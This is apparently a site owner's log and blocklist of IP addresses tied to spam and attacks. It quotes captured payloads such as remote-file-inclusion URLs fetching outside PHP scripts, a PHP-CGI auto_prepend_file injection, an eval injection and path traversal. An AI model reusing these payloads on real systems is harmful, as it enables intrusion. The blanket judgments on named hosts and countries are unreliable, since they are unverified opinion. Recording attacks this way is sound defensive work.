216.244.85.234 Company: United States – Seattle Private Customer Comment Spammer
74.221.210.141 Company: United States – Scranton Volumedrive Comment Spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02
Bork-edition [en]
85.195.99.198 Company: Germany – Hanau Am Main Velia.net Internetdienste Gmbh
Shared hosting server: 6 websites
Comment spammer
195.3.146.94 Company: Latvia – Riga Rn Data Sia
198.245.63.218 Hostname: ns4000889.ip-198-245-63.net
Company: Canada – Montreal Ovh Hosting Inc.
Website server: 2 websites: onenetwork.net.au , sbgrd.com
Comment spammer
Bad host
192.69.90.202 Company: United States – Scranton Volumedrive Comment spammer
Listed in Project Honeypot – Dictionary Attacker
195.3.146.94 Company: Latvia – Riga Rn Data Sia Trying to login to WordPress admin
Reported in Project Honeypot as hacker looking for vulnerabilities
173.254.216.66 Hostname: exit-01a.noisetor.net
Company: United States – Los Angeles Noisebridge
OC3-NETWORKS-AS-NUMBER Web Africa Proxy aut-num object
Comment spammer
50.22.36.34 Hostname: 50.22.36.34-static.reverse.softlayer.com
Company: United States – Dallas Softlayer Technologies Inc.
Shared hosting server: 59 websites
Looking for exploits:
stp/admin/index.php
/cgi-bin/te/login.cgi
/cgi-bin/te/wlogin.cgi
/te3/signup.php
188.165.155.249 Company: France – Roubaix Ovh Systems Comment spammer
67.212.164.188 Hostname: node05.tmdvps.com
Company: United States – Chicago Singlehop Inc.
Shared hosting server: 96 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/Real-Estate-v1.3/thumb.php?src=http:
//flickr.com.tr.realityinformatica.com/bad.php
37.59.209.228 Company: France – Roubaix Ovh Systems Trying to login/register
Bad Host
88.146.225.36 Hostname: 88-146-225-36.amigonet.cz
Company: Czech Republic – Usti Nad Labem Amigonet S.r.o. Usti Nad Labem
looking for non-existent URLs
URL//sfdsfsdfsd
Honeypot listing: Mail server and Dictionary attacker
188.138.143.93 Hostname: 188-138-143-93.starnet.md
Company: Moldova, Republic Of – Chisinau Starnet S.r.l
Trying to login/register
/wp-login.php?action=register
/signup.php
/login.php
144.76.60.181 Hostname: static.181.60.76.144.clients.your-server.de
Company: Germany – Berlin Server Block
Malicious User Agent detected:
python-requests/1.1.0 CPython/2.7.3 Linux/3.2.0-39-generic
90.223.205.65 Hostname: 5adfcd41.bb.sky.com
Company: United Kingdom – London Sns Addresses
looking for Java scripts
looking for non existent paths
Malicious User Agent: Java/1.4.1_04
50.115.173.173 Company: United States – Kansas City Dnsslave.com
Website server: 1 website: christianlouboutinpasvcher.com
Comment Spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02
Bork-edition [en]
162.211.122.2 Company: United States – Lewes Ilika.net Llc Comment Spammer
216.156.103.42 Hostname: 216.156.103.42.ptr.us.xo.net
Company: United States – New York City Xo Communications
Bad Behaviour detected:
1. Abuse of Digg share script
/\’+encodeURIComponent(location.href)+\’&title=\’+encodeURIComponent(document.title),%20\’digg\’,\’toolbar=no,width=1020,height=600\’);%20return%20false;
Multiple violations2. DOMAIN/this.options
208.87.233.180 Hostname: webdefence.cluster-g.websense.net
Company: United States – Anchorage Surfcontrol Inc.
Comment Spammer
37.1.222.114 Company: Germany Berlin 3nt Solutions LlpAS28753 LEASEWEB-DE Leaseweb Germany GmbH THIS IS A HACKER the IP MUST BE BANNEDSuccessfully hacked a GoDaddy server and at least one hosted website this year with a base64_eval code injection attack.
The script allowed the hacker FTP access the server, and to upload a file to WordPress /wp-admin/includes giving him FTP access to the site.
The hacker repeatedly used the FTP access to reload his modified WordPress template files.
He had access to the MySQL database allowing him to reset the database to one with his code, at will
We identified this IP as at least one of the IPs in use when the hacker returned yesterday looking for his script file.
37.9.53.50 Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd.
Website server: 1 website – crazzyunix.com
Looking for vulnerabilities
/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html
83.149.48.74 Russian Federation – Kemerovo Cjsc Mobicom-novosibirsk Network Brute Force dictionary attack on wp-login.php
83.149.21.217 Russian Federation – Kazan Ojsc Mss-povolzhe Network Brute Force dictionary attack on wp-login.php
91.105.164.173 Hostname: host-91-105-164-173.bbcustomer.zsttk.net
Company: Russian Federation – Novosibirsk Jsc Zap-sib Transtelecom Novosibirsk
Brute Force dictionary attack on wp-login.php
197.251.175.178 Company: Ghana – Accra Vodafone Ghana Adsl Dhcp Pool Ip Addresses Brute Force dictionary attack on wp-login.php
189.139.102.243 Hostname: dsl-189-139-102-243-dyn.prod-infinitum.com.mx
Company: Russian Federation – Arkhangel’sk Jsc North-west Telecom Arkhangelsk Branch
Brute Force dictionary attack on wp-login.php
92.101.112.8 Hostname: ip-008-112-101-92.pools.atnet.ru
Company: Mexico – Mexico City Gestion De Direccionamiento Uninet
Brute Force dictionary attack on wp-login.php
188.114.21.120 Hostname: 120.21.114.188.donpac.ru
Company: Russian Federation – Rostov-na-donu Ojsc Rostelecom Macroregional Branch South
Brute Force dictionary attack on wp-login.php
62.249.146.118 Company: Russian Federation – Khabarovsk Transtelecom-dv Brute Force dictionary attack on wp-login.php
197.205.62.33 Company: Algeria – Algiers Adresses Dynamic Setif Brute Force dictionary attack on wp-login.php
41.223.160.234 Company: Sudan – Khartoum Mtn Sudan Brute Force dictionary attack on wp-login.php
95.54.181.62 Hostname: pppoe.95-54-181-62.dynamic.murmansk.avangarddsl.ru
Company: Russian Federation – Saint Petersburg Ojsc North-west Telecom
Brute Force dictionary attack on wp-login.php
105.239.149.111 Company: Sudan – Khartoum Zain Sd 2g 3g Lte Apn Internet Pool 2 Ark Brute Force dictionary attack on wp-login.php
37.123.32.188 Company: Turkey – Istanbul Metronet Iletisim Teknoloji A.s. Brute Force dictionary attack on wp-login.php
189.132.223.185 Hostname: dsl-189-132-223-185-dyn.prod-infinitum.com.mx
Company: Mexico – Mexico City Gestion De Direccionamiento Uninet
Hacker looking for vulnerabilities
Multiple violations:1. Trying to acces wp-config files:
/wp-config.old
/wp-config.orig
/wp-config.original
/wp-config.php.bak
/wp-config.php.save
/wp-config.php.swo2. Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/d5-business-line/assets/js/thumb.php
/wp-content/themes/d5-business-line/classes/timthumb.php
/wp-content/themes/d5-business-line/classes/thumb.php
/wp-content/themes/d5-business-line/core/libs/thumbnails/timthumb.php
/wp-content/themes/d5-business-line/cores/thumbnails/thumb.php
/wp-content/themes/d5-business-line/extensions/auto-thumb/timthumb.php
/wp-content/themes/d5-business-line/functions/timthumb.phpAttack continued for several minutes – logged over 100 403 errors
50.87.144.61 Hostname:gator3042.hostgator.com
Company: United States – Provo Unified Layer
Shared hosting server: 535 websites
PHP eval script injection attack:
/?page=data:,%3C?php%20eval($_GET[a]);%20?%3E&dir=data:
,%3C?php%20eval($_GET[a]);%20?%3E&file=data:,%3C?php
%20eval($_GET[a]);%20?%3E&asc=data:,%3C?php%20eval(
$_GET[a]); ….. m=data:,%3C?php%20eval($_GET[a]);
%20?%3E&a=print-439573653*57;
94.242.237.80 Company: Luxembourg – Steinsel Root Sa Comment spammer
14.139.59.54 Hostname: cazri.res.in
Company: India – Jodhpur Central Arid Zone Research Institute Jodhpur
Website server: 1 website -cazri.res.in
Comment spammer / Harvester
82.222.233.130 Company: Turkey – Izmit Tellcom Fiber Dynamic dDoS Brute Force / Dictionary Attack on wp-login.php
85.110.37.122 Hostname: 85.110.37.122.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
dDoS Attack on WordPress admi
/administrator/index.php
/index.php?option=com_user&task=completereset
192.69.90.208 Company: United States – Scranton Volumedrive Comment spammer
209.239.112.162 Hostname: falcon370.server4you.net
Company: Brazil – Saint Louis Hosting Solutions International Inc.
Shared hosting server: 21 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/newoffer/timthumb.php?src=http %3A%2F%2F
picasa.com.rodrigorigoni.com.br%2Fsimple.php
88.190.47.234
88.190.61.100
Hostname: 88-190-47-234.rev.dedibox.fr
Company: France – Lyon Free Sas
Comment spammer
82.83.51.31 Hostname: dslc-082-083-051-031.pools.arcor-ip.net
Company: Germany – Bochum Arcor Ag
Malicious user agent:
PEAR HTTP_Request class ( http: //pear.php.net/ )
50.118.202.184 Company: United States – San Jose Possum Bilities WordPress trackback spammer
186.202.126.26 Hostname: pleskcl0024.hospedagemdesites.ws
Company: Brazil – Rio Branco Locaweb Servicos De Internet S/a
Shared hosting server: 159 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
46.105.103.9 Hostname: ns383149.ovh.net
Company: France – Roubaix Ovh Systems
Shared hosting server: 20 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
URL/&sa=U&ei=ar3TUfrWNMOQiQLsh4G4Ag&ved=
0CBgQFjAA&usg=AFQjCNG8Ka1WaFPEr8htFW6Ur8ViVZ5h7g
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.golfpops.com/good.php
198.57.231.71 Hostname: sma.smahosting.com
Company: United States – Provo Unified Layer
Shared hosting server: 123 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
URL/&sa=U&ei=ar3TUfrWNMOQiQLsh4G4Ag&ved=
0CBgQFjAA&usg=AFQjCNG8Ka1WaFPEr8htFW6Ur8ViVZ5h7g
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.golfpops.com/good.php
94.41.160.75 Hostname: host-94-41-160-75.unknown.o56.ru
Company: Russian Federation – Orenburg Ojsc Ufanet
Comment Spammer
91.207.116.193 Company: Ukraine – Kharkiv Rise-v Ltd Comment Spammer
94.27.80.230 Hostname: SOL-FTTB.230.80.27.94.sovam.net.ua
Company: Ukraine – Kiev Golden Telecom
Comment Spammer
192.95.18.239 Company: United States – Newark Ovh Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02
Bork-edition [en]
94.27.64.123 Hostname: SOL-FTTB.123.64.27.94.sovam.net.ua
Company: Ukraine – Kiev Golden Telecom
Comment Spammer
188.65.209.166 Hostname: host-188.65.209.166.knopp.ru
Company: Russian Federation – Moscow Limited Liability Company Knopp
Website server: 2 websites – isbtechno.ru uhappy.ru
HACKER – Multiple violations:
Looking for vulnerabilities:
/wp-includes/jahat.php
/wp-includes/class-wp-customize-client.php
wp-includes/wp-script.php
/logx.txt
c.txt
x.txtBrute Force Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/patientpuptraining/thumb.php?src=http
%3A%2F%2Fpastoralvocacional.cnbb.org.br%2Fbad.php
86.58.171.67 Company: Denmark – Glostrup Jay.net A/s
Shared hosting server: 35 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/plugins/extend-wordpress/helpers/timthumb.php?src=http
%3A%2F%2Fflickr.com.sohbetblog.tk%2Fxp.php
204.13.248.119 Hostname: site-redirect.dyndns.com
Company: United States – Manchester Dynamic Network Services Inc.
Shared hosting server: 314 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=http
%3A%2F%2Fpicasa.com.produitsnaturelsgammaforce.com/kikok.php
206.214.215.95 Hostname: vps.ravienergie.com
Company: United States – Warren Ravi Energie Inc.
Website server: ravienergie.com – This server/website is hacked
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=http
%3A%2F%2Fwordpress.com.atexpress.com.ve%2Fcpx.php
108.163.128.171 Company: Poland – Gdynia Static Ip DOMAIN/phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation
%3d1+-d+disable_functions%3d”+-d+open_basedir%3dnone+-d+auto_prepend_file%3dhttp:
//51zyzg.com/1.txt+-n
207.177.17.150 Hostname: 150.17.177.207.dyn.southslope.net
Company: United States – North Liberty South Slope Cooperative Telephone Company
RFI (Remote File Inclusion) attempt
DOMAIN/phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation
%3d1+-d+disable_functions%3d%27%27+-d+open_basedir%3dnone+-d+auto_prepend_file
%3dhttp: //51zyzg.com/1.txt+-n
198.20.175.42 Company: United Kingdom Darlington Valuevps Hacker trying base64 attack with very long encoded strings
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]
plus about 400 more bits in strings
173.208.2.33 Hostname: 173.208.2.33.rdns.ubiquityservers.com
Company: United States – Chicago Ubiquity Server Solutions Chicago
Trying to lgoin and add content:
/member/newarticle.php
/member/login.php
85.88.37.203 Hostname: da.hostbase.eu
Company: Belgium – Brussels Eusip Bvba
Shared hosting server: 26 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
188.240.134.125 Company: Romania – Iasi Sc Eurocris Impex Srl Comment spammer
188.240.128.0 – 188.240.143.255 Company: Romania – Iasi Sc Eurocris Impex Srl Banned region: Romania
88.190.47.233 Hostname: 88-190-47-233.rev.dedibox.fr
Company: France – Paris Free Sas
Comment spammer
142.91.81.87 Hostname: 142.91.81.87.rdns.ubiquity.io
Company: United States – Dallas Ubiquity Server Solutions Dallas
Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
193.180.119.113 Company: Poland – Tarnowskie Gory Livenet Sp. Z O.o. Malicious User Agents:
PHP/5.2.10
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Known Rule Breaker (Project Honeypot)
193.180.119.0 – 193.180.119.255 Company: Sweden – Stockholm Proxy Services Bad host
Proxy service – Proxy services are banned
108.163.128.171 Company: Canada Montreal Iweb Ne R017 01s
Website server – 3 websites: alagoinhasnoticias.com.br ba360graus.com.br revistaautomotiva.com.br
Hacker attempting Remote File Injection
/cart.php?a=byroe&templatefile=../../../configuration.php%00
Canadian IP hosting Brazilian websites
91.238.134.174 Hostname: hosted-by.slaskdatacenter.pl
Company: Poland – Tarnowskie Gory Livenet Sp. Z O.o.
Hacker trying to access site admin
/admin/
/cncat_add.php
/dodaj-wpis
/dodaj
188.190.98.18 Hostname: hosted-in.infiumhost.com
Company: Ukraine – Kharkiv Infium Ltd
Hacker trying to inject base64 code
DOMAIN/phppath/php/%70%68%70%70%61%74%68/%70%68%70?%2D%64+ etc…
188.190.96.0 – 188.190.127.255 Company: Ukraine – Kharkiv Infium Ltd Banned region: Ukraine
100.43.64.0 – 100.43.95.255 Company: Russian Federation Moscow Yandex Inc Banned search engine: Yandex
172.245.209.136 Hostname: vps.ubuymeds.nett
Company: United States – Buffalo Colocrossing (ColoCrossing)
Shared hosting server: 61 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
206.214.211.228 Hostname: vps.ubuymeds.nett
Company: United States – New York City Killa Beatz Inc
Website server: killabeatzland.com
Remote File Inclusion attempt / WordPress GD Star ratings plugin RFI exploit:
/wp-content/gd-star-rating/?src=http %3A%2F%2Fpisca.com.filmeonlinehd.net/kikok.php
105.236.62.245 Hostname: 105-236-62-245.access.mtnbusiness.co.za
Company: South Africa Johannesburg Mtn Business Solutions (pty) Ltd
Looking for indexes:
URL/_index.html
193.234.166.22 Company: Sweden – Stockholm Proxy Services Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
87.23.60.186 Hostname: host186-60-static.23-87-b.business.telecomitalia.it
Company: Italy Venice Telecom Italia Net
WordPress exploit attempt / Known SQL injection vulnerability in ripe-hd-player plugin
/wp-content/plugins/ripe-hd-player/config.php?id=-3
189.238.86.228 Hostname: dsl-189-238-86-228-dyn.prod-infinitum.com.mx
Company: Mexico Mexico City Uninet S.a. De C.v.
RFI (Remote File Inclusion) attempt
/phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation%3d1+-d+
disable_functions%3d”+-d+open_basedir%3dnone+-d+auto_prepend_file%3dhttp:
//51zyzg.com/1.txt+-n
83.219.133.32 Hostname: ppp-static8-32.tis-dialog.ru
Company: Russian Federation – Kaliningrad Tis Dialog Llc
Comment spammer
Tried to login/register on restricted website
looking for forums and anywhere else a post form may exist
83.219.131.0 – 83.219.137.255 Russian Federation – Kaliningrad Tis Dialog Llc Banned region: Russian Federation
208.89.208.161 Company: United States – Kansas City Dnsslave.com Tried to login/register on restricted website
Multiple attempts
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
198.2.203.17 Company: United States – Sunnyvale Peg Tech Inc Comment spammer
Tried to brute force the comment form
e.g: /comment/reply/192++++++++++++++++++++++++
Result:+chosen+nickname+%22ncxdthdja%22;+captcha+
recognized;+nofollow+is+found;+success+-+posted+
to+first+encountered+partition+%22/blog%22;+BB-
code+not+working;Bad host: Peg Tech Inc
83.15.227.34 Hostname: eop34.internetdsl.tpnet.pl
Company: Poland – Gdynia Static Ip
Comment spammer / Dictionary attacker
Tried to login/register on restricted website
/administrator/index.php
/wp-login.php
/?q=user
/admin.php
95.167.218.226 Company: Russian Federation – Moscow Ojsc Rostelecom Comment spammer
95.167.0.0 – 95.167.255.255 Company: Russian Federation – Moscow Ojsc Rostelecom Banned region: Russian Federation
142.91.79.14 Hostname: 142.91.79.14.rdns.ubiquity.io
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Comment spammer
Tried to login/register on restricted website
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5;
Windows NT 5.0) Opera 7.02 Bork-edition [en]
108.62.82.147 Hostname: optimization.myconsumerreward.net
Company: United States – Chicago Ubiquity Server Solutions Chicago
Comment spammer
Tried to login/register on restricted website
174.74.52.35
Hostname: ip174-74-52-35.om.om.cox.net
Company: United States – Omaha Cox Communications
Website server: wigodsky.net
Seen without any user agent.
Seems to be pinging the site – no pages ever loaded
Classed as Rule Breaker in Project Honeypot
Bad host: Cox Communications
130.255.31.178 Company: United Kingdom – Weston On The Green Satellite Solutions Worldwide Ltd
Website: http: //www.satellitesolutionsworldwide.com/
Bad bot:
Crawled entire website in less than 1 minute using 174 different User Agent IDs
50.115.166.128
50.115.167.177
Company: United States – Kansas City Dnsslave.com Comment spammer, Mail server / Trackback spammer
Hijacked browser UA:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET
CLR 1.1.4322; PeoplePal 6.2)
50.117.49.108 Company: United States – San Jose Yan Server Company – Feng Yong Comment spammer
198.100.144.229 Hostname: debill.corbina.com.ua
Company: Canada – Montreal Ovh Hosting Inc.
Looking for indexes
/index.php
198.100.144.0 – 198.100.159.255 Company: Canada – Montreal Ovh Hosting Inc. Bad host: Montreal Ovh Hosting Inc.
87.110.0.0 – 87.110.127.255 Company: Latvia – Riga Address Pool For Ltc-home Customers Banned region: Latvia
93.170.13.212 Company: Netherlands – Amsterdam Alfa Telecom S.r.o. Comment spammer
Trying to add page: node/add
199.119.181.232 Company: United States – Orlando Infinitum Technologies Inc.
Shared hosting server: 51 websites websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=http:
//flickr.com.golfpops.com/good.php
142.91.79.14 Hostname: 142.91.79.14.rdns.ubiquity.io
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Tried to login/register on restricted website
Seen with 2 user agents:
Malicious UA: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Suspected mail.ru tool:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157);
.NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)
151.237.177.86 Company: Sweden – Stockholm Deepak Mehta Fie Trackback/pingback spammer
Posting fake trackback links to www DOT VtJt5H DOT net
151.237.177.0 – 151.237.177.255 Company: Sweden – Stockholm Deepak Mehta Fie Bad host: Deepak Mehta Fie
37.59.209.228 Company: France – Roubaix Ovh Systems Trackback/pingback spammer
Posting fake trackback links to www DOT iSKLR68T0 DOT org
37.59.209.231 Company: France – Roubaix Ovh Systems Trackback/pingback spammer
Posting fake trackback links to www DOT 06Eek DOT net
23.82.106.20 Company: United States – Nobis Technology Group Llc Comment Spammer
198.27.64.0 – 198.27.127.255 Canada Montreal Ovh Hosting Inc. Bad host: Montreal Ovh Hosting Inc.
67.202.113.195 Hostname: debill.corbina.com.ua
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
88.81.224.0 – 88.81.255.255 Hostname: debill.corbina.com.ua
Company: Ukraine – Kiev Top Net Pjsc
Banned region: Ukraine
88.81.246.238 Hostname: debill.corbina.com.ua
Company: Ukraine – Kiev Top Net Pjsc
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
174.128.227.98 Company: United States – Cleveland Sharktech.
Website server: ybzssm.com
/&sa=U&ei=ef7EUfvCFYPEPdnsgcgL&ved=0CMUCEBYwWzhk&usg=AFQjCNEjzkRd-
IFn1–X3I9EezcvurZteg///?controller=../../../../../../../../../../../../../../../../../../../..
/../../../../proc/self/environ%0000&option=com_frontenduseraccess
193.235.43.235 Company: Sweden – Stockholm Proxy Services Trying to register on restricted site
142.4.98.162 Company: United States San Jose Peg Tech Inc
PEGTECHINC – PEG TECH INC
Comment spammer
Using very long requests:
URL+%5BPLM=0%5D%5BN%5D+GET+URL+%5B0,48305,5642%5D+-%3E+%5BN%5D
+POST+URL/comment/reply/184+%5B0,0,46026%5D+-%3E+%5BN%5D+GET+URL+
%5B0,0,59504%5D+-%3E
142.4.96.0 – 142.4.127.255 Company: United States San Jose Peg Tech Inc
PEGTECHINC – PEG TECH INC
Bad host: San Jose Peg Tech Inc
94.202.205.200 Company: United Arab Emirates – Dubai Emirates Integrated Telecommunications Company Pjsc Hacker/Spammer:
Looking for indexes – URL/index.php
94.202.204.0 – 94.202.207.255 Company: United Arab Emirates – Dubai Emirates Integrated Telecommunications Company Pjsc Host banned /Traffic from Dubai banned
195.128.174.115 Hostname: web15.talkactive.net
Company: Denmark – Copenhagen Talk Active Aps
Shared hosting server IP: 423 websites websites
Brute force attack attempted – wpOnlineStore/osCommerce/Zencart exploit:
URL&sa=U&ei=mznGUbX7K46qOtSPgJgI&ved=0CMQBEBYwNA&usg=
AFQjCNG-xUhm1POEe3qP8vLCv6I17J-B8A/admin/categories.php/login.php?cPath=
&action=new_product_preview/admin/categories.php/login.php?cPath=&action=
new_product_preview/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
91.217.202.28 Hostname: hostingland.ru
Company: Russian Federation – Novosibirsk Sviaz-service Ltd.
Shared hosting server IP: 297 websites
HACKERViolation 1: Using GET request with extremely long queries:URL/%22%20onmousedown=
%22return%20rwt(this,\’\’,\’\’,\’\’,\’112\’,\’AFQjCNEso5ON7mrYyRMnsFNyh4-sHqf2Yw\’,\’\’,\’
0CE8QFjALOGQ\’,\’\’,\’\’,event)%22%3EPlugins%20Archives%20%7C%20-%20***%20***%
20-%20****%3C/a%3E%3C/h3%3E%3Cdiv%20class=%22s%22%3E%3Cdiv%3E%3Cdiv%
20class=%22thb%20th%22%20style=%22height:44px;width:44px%22%3E%3Ca%20href=
%22/searchViolation
2: Remote File Inclusion attempt / WordPress timthumb RFI exploit:/wp-content/themes/bueno
/timthumb.php?src= http %3A%2F%2Fflickr.com.danielcinelli.com%2Fread.php
91.217.202.0 – 91.217.202.255 Company: Russian Federation – Novosibirsk Sviaz-service Ltd. Banned region: Russian Federation
81.39.9.52 Hostname: 088156149007.stargardszczecinski.vectranet.pl
Company: Spain – Madrid Telefonica De Espana Sau
Looking for scripts
Looking for non-existent URLS
Malicious user agent: Java/1.7.0_25
88.156.149.7 Hostname: 088156149007.stargardszczecinski.vectranet.pl
Company: Poland – Szczecin Vectra S.a.
Comment Spammer
66.248.194.196 Company: United States – Dallas Joel Morris Trying to login with username jamelola
Trying to add content: /?q=node/add
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
174.128.227.98 Company: United States – Cleveland Sharktech
Website server: ybzssm.com
Hacker
///?option=com_frontenduseraccess&controller=../../../../../../../../../../../../../../../../../
../../../../../../../proc/self/environ%0000URL/&sa=U&ei=ef7EUfvCFYPEPdnsgcgL
&ved=0CMUCEBYwWzhk&usg=AFQjCNEjzkRd-IFn1–X3I9EezcvurZteg///?
option=com_frontenduseraccess&controller=../../../../../../../../../../../../../../../../../../..
/../../../../../proc/self/environ%0000
204.84.216.200 Company: United States – Holly Springs North Carolina Research And Education Network Comment spammer
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
186.202.126.16 Hostname: pleskcl0019.hospedagemdesites.ws
Company: Brazil – Rio Branco Locaweb Servicos De Internet S/a
Shared hosting server IP: 186 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=http:
//picasa.com.ivanquerino.net/jos.php
188.143.234.127 Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Comment spammer
Extremely high threat rating
188.143.234.0 – 188.143.234.255 Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Banned region: Russian Federation
190.204.16.127 Hostname: 190-204-16-127.dyn.dsl.cantv.net
Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Hotlinking
Banned region: Venezuela
199.19.249.196 Company: United States – Sunnyvale Blue Coat Systems Inc
Website server: tnschulungszentrum.de
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727;
.NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
199.19.248.0 – 199.19.255.255 Company: United States – Sunnyvale Blue Coat Systems Inc Bad Host
Spy bots
199.80.54.252 Hostname: c-n150-u1162-252.webazilla.com
Company: United States – Palo Alto Wz Communications Inc.
Malicious user agent detected:
Python-urllib/2.6
142.4.117.161 Company: United States – San Jose Jiusutechnology Limited Liability Company
PEGTECHINC – PEG TECH INC
Comment spammer
Bad host: PEG TECH INC
142.4.117.160 – 142.4.117.167 Company: United States – San Jose Jiusutechnology Limited Liability Company
PEGTECHINC – PEG TECH INC
Bad host: PEG TECH INC
142.4.117.0 – 142.4.117.255 PEGTECHINC – PEG TECH INC Bad host: PEG TECH INC
151.237.191.253 Company: United States – Asheville Deepak Mehta Fie Comment spammer
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
Bad host: Deepak Mehta Fie
216.224.169.48 Hostname: servidor.tideagro.com
Company: United States – Grass Valley Softcom America Inc.
Shared hosting server IP: 7 websites
Suspected hacker
Bad requests including code characters and wp-sample.php in lookup
/&sa=U&ei=OgjCUbHbFsy3hAe5uYC4Cw&ved=0CGQQFjAX&usg=AFQjCNF0Jr_l4T5eNcHArY-h-
hfHlgsb1w//wp-sample.phpURL//wp-sample.php/&sa=U&ei=NPLBUYL4Ho78qQGX0ICADw&ved=
0CKwCEBYwWg&usg=AFQjCNEHoWkX6Uoviiyqa_5IP6sboXsC-g//wp-sample.php
142.4.213.179 Hostname: ns4004225.ip-142-4-213.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment spammer – high threat rating (52) in Project Honeypot
142.4.192.0 – 142.4.223.255 Company: Canada – Montreal Ovh Hosting Inc. Bad host: Montreal Ovh Hosting Inc.
216.218.250.151 Hostname: pluto-we7.initsoft.com
Company: United States – Santa Clara Bigbiz Internet Services
Shared hosting server IP: 15 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
68.68.99.219 Company: United States – Sunnyvale Prgmr.com Inc. Trying to login with user name Adam342, trying to add post, bad look-up request
/index.php?usr_login=Adam342&btn_submit=Find&t=finduser
/viewmember?member=Adam342
/add_story.php
/search.php/all/Best%20website%20for%20quality%20game%20cheats%21
Listed as Comment Spammer in Project Honeypot
190.61.5.12 Hostname: ws07.host4g.com
Company: Argentina – Buenos Aires Ifx Networks Argentina S.r.l.
Shared hosting server IP: 771 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/Quadro/timthumb.php?src=http%3A%2F%2Fdollsonmission.net%2Fyoutube.php
75.136.30.152 Hostname: 75-136-30-152.static.jcsn.tn.charter.com
Company: United States – Jackson Charter Communications
Comment spammer
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
100.43.83.149 Company: Russian – Federation Moscow Yandex Inc Bad bot: YandexImages/3.0
Rule breaker. Ignores robots.txt
100.43.64.0 – 100.43.95.255 Company: Russian – Federation Moscow Yandex Inc
65.55.213.247 Hostname: msnbot-65-55-213-247.search.msn.com
